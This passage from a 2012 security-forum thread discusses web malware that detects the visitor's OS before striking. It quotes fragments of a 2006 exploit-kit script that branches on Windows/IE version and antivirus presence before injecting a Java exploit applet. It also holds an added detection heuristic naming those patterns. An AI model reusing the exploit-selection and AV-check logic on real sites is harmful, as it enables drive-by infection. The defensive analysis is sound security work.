Wilders Security Forums  

  #1  
Old July 11th, 2012, 06:13 PM
Thankful Thankful is offline
Very Frequent Poster
 
Join Date: Feb 2005
Location: New York City
Posts: 2,407
Default Web-based malware determines your OS, then strikes

http://www.technolog.msnbc.msn.com/t...strikes-876194
  #2  
Old July 11th, 2012, 06:25 PM
m00nbl00d m00nbl00d is offline
Incredibly Massive Poster
 
Join Date: Jan 2009
Posts: 6,460
Default Re: Web-based malware determines your OS, then strikes

Java... where are you?
  #3  
Old July 11th, 2012, 07:07 PM
Gullible Jones
 
Posts: n/a
Default Re: Web-based malware determines your OS, then strikes

I just want to see a Java-based remote access trojan try to hide itself. Kind of like a rhinoceros trying to hide in your front yard.

Quote:
With more malware attacks on Apple's OS in the past year, and ongoing strikes against Windows-based systems, "although the amount of malware written for different operating systems can vary, it's becoming increasingly hard to argue on any OS that it's safe to surf the Web without anti-virus protection," Cluley wrote. And it's hard to argue with that.

LOL. "Buy it! Buy it or the malware will get you!" Lovely hype there from Sophos, and lovely of the columnist to just swallow it up.
  #4  
Old July 11th, 2012, 07:23 PM
Rmus Rmus is offline
Exploit Analyst
 
Join Date: Mar 2005
Posts: 3,624
Default Re: Web-based malware determines your OS, then strikes

Quote:
Web-based malware determines your OS, then strikes

The payload? "Once it has found out which operating system you are running, the Java class file will download the appropriate flavor of malware,

More than six years ago, a similar trick determined the version of Windows and IE, and then served up the appropriate exploit.

Here is some of the code from an exploit in February, 2006:

Code:
// launching exploit which number is depends on Windows and IE versions
function Get_Win_Version(IE_vers)
  if (IE_vers.indexOf('Windows 95') != -1) return "95"
  else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
  else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
  else if (IE_vers.indexOf('Windows 98') != -1) return "98"
  else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
  else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
  else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"

For example, if the user was running Win2K and IE, three exploits were possible:

Code:
case "2K":
  if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810)) { ExploitNumber=1; }
  else // if JVM = 5.0.3810.0 or higher
  if ((fNortonAV==0)&&(fMcAfee==0)) { ExploitNumber=3; }
  else { ExploitNumber=2; }

If Exploit (Case) 1 was found to be appropriate, it launched a Java exploit:


Code:
case 1:
  Trojan_Path=Trojan_Path+"MS03-11";
  ObjectContainer.innerHTML= applet archive="'+InetPath+'/'+'ie0601a.jar"

And so it goes...


----
rich
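
Added example, not part of the original post or of the 2006 script: a static heuristic a defender could run over page JavaScript to flag the pattern quoted above (several OS-version checks, antivirus-presence flags, then an applet/JAR written into the page). The regexes, weights, thresholds and both sample scripts are assumptions constructed for illustration.

```javascript
// Heuristic scorer for "fingerprint the client, then deliver" scripts.
// All patterns and weights below are illustrative assumptions.
const OS_TOKEN = /indexOf\(\s*['"](Windows (?:95|98|NT \d(?:\.\d)?)|Win 9x [\d.]+|Mac OS X|Linux)['"]\s*\)/g;
const AV_FLAG = /\b\w*(norton|mcafee|kaspersky|avast)\w*\b/gi;
const APPLET_INJECT = /(innerHTML|document\.write)[^;]*(applet|\.jar|<object)/i;

function scoreScript(source) {
  // Distinct OS/version strings the script compares against.
  const osChecks = new Set();
  for (const m of source.matchAll(OS_TOKEN)) osChecks.add(m[1]);
  // Identifiers that name an antivirus product (e.g. fNortonAV).
  const avFlags = new Set();
  for (const m of source.matchAll(AV_FLAG)) avFlags.add(m[0].toLowerCase());
  const findings = {
    osChecks: [...osChecks],
    avFlags: [...avFlags],
    injectsApplet: APPLET_INJECT.test(source),
  };
  let score = 0;
  if (osChecks.size >= 3) score += 2;   // branching on many OS versions
  if (avFlags.size > 0) score += 2;     // behaviour depends on AV presence
  if (findings.injectsApplet) score += 3; // dynamically writes applet/JAR markup
  findings.score = score;
  findings.verdict = score >= 5 ? "suspicious" : score >= 2 ? "review" : "benign";
  return findings;
}

// Constructed sample modelled on the structure quoted in the post.
const SAMPLE_FINGERPRINT = `
function getWin(ua) {
  if (ua.indexOf('Windows 98') != -1) return "98";
  else if (ua.indexOf('Windows NT 5.0') != -1) return "2K";
  else if (ua.indexOf('Windows NT 5.1') != -1) return "XP";
}
if ((fNortonAV == 0) && (fMcAfee == 0)) { n = 3; } else { n = 2; }
ObjectContainer.innerHTML = '<applet archive="' + base + '/sample.jar"></applet>';
`;

// Constructed benign sample: one OS check to pick a download link.
const SAMPLE_BENIGN = `
if (navigator.userAgent.indexOf('Mac OS X') != -1) { showMacDownload(); }
`;

console.log(scoreScript(SAMPLE_FINGERPRINT), scoreScript(SAMPLE_BENIGN));
```

A single OS check on its own scores zero here; it is the combination of version branching, AV checks and applet injection that raises the verdict.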
  #5  
Old July 11th, 2012, 08:27 PM
Gullible Jones
 
Posts: n/a
Default Re: Web-based malware determines your OS, then strikes

Determining which version of Windows is used (or which browser) is common enough that I've personally encountered it ITW. Last time IIRC was with a fake antivirus site, which installed different versions depending on whether you were using IE 6, 7, or 8.
  #6  
Old July 12th, 2012, 10:32 AM
xxJackxx xxJackxx is offline
Very Frequent Poster
 
Join Date: Oct 2008
Location: USA
Posts: 2,537
Default Re: Web-based malware determines your OS, then strikes

Quote:
Originally Posted by m00nbl00d
Java... where are you?

Not on any of my machines.
  #7  
Old July 12th, 2012, 11:35 AM
Hungry Man Hungry Man is offline
Incredibly Massive Poster
 
Join Date: May 2011
Posts: 8,486
Default Re: Web-based malware determines your OS, then strikes

Pretty cool except:

1) I don't have Java installed

2) If I were to install Java it would be sandboxed in a heartbeat

It also uses the SET